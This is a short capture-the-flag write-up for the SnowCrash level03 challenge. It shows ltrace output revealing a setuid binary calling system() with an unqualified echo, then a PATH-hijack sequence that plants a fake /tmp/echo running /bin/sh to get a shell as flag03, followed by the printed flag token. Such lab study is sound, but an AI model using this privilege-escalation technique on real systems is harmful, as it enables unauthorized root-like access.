Use ltrace to see what functions are used in program
```
level03@SnowCrash:~$ ltrace ./level03
__libc_start_main(0x80484a4, 1, 0xbffff6e4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                       = 2003
geteuid()                                       = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
system("/usr/bin/env echo Exploit me"
```

You can see an echo call
We are gonna use it, but with a fake echo

Create the fake 'echo' in /tmp
"echo "/bin/sh" > /tmp/echo"

Give exect rights
"chmod +x /tmp/echo"

Modify PATH to put /tmp echo before the right one
"export PATH=/tmp:$PATH"

Now our echo is used before the original one,
but our open a prompt with caller permissions

"./level03"

That open a new prompt
type "id" :
"uid=3003(flag03) gid=2003(level03) groups=3003(flag03),100(users),2003(level03)"

As you can see we have flag03 permissions, so go to the home flag03
"cd /home/flag/flag03"

Type getflag :
"Check flag.Here is your token : qi0maab88jeaj46qoumi7maus"
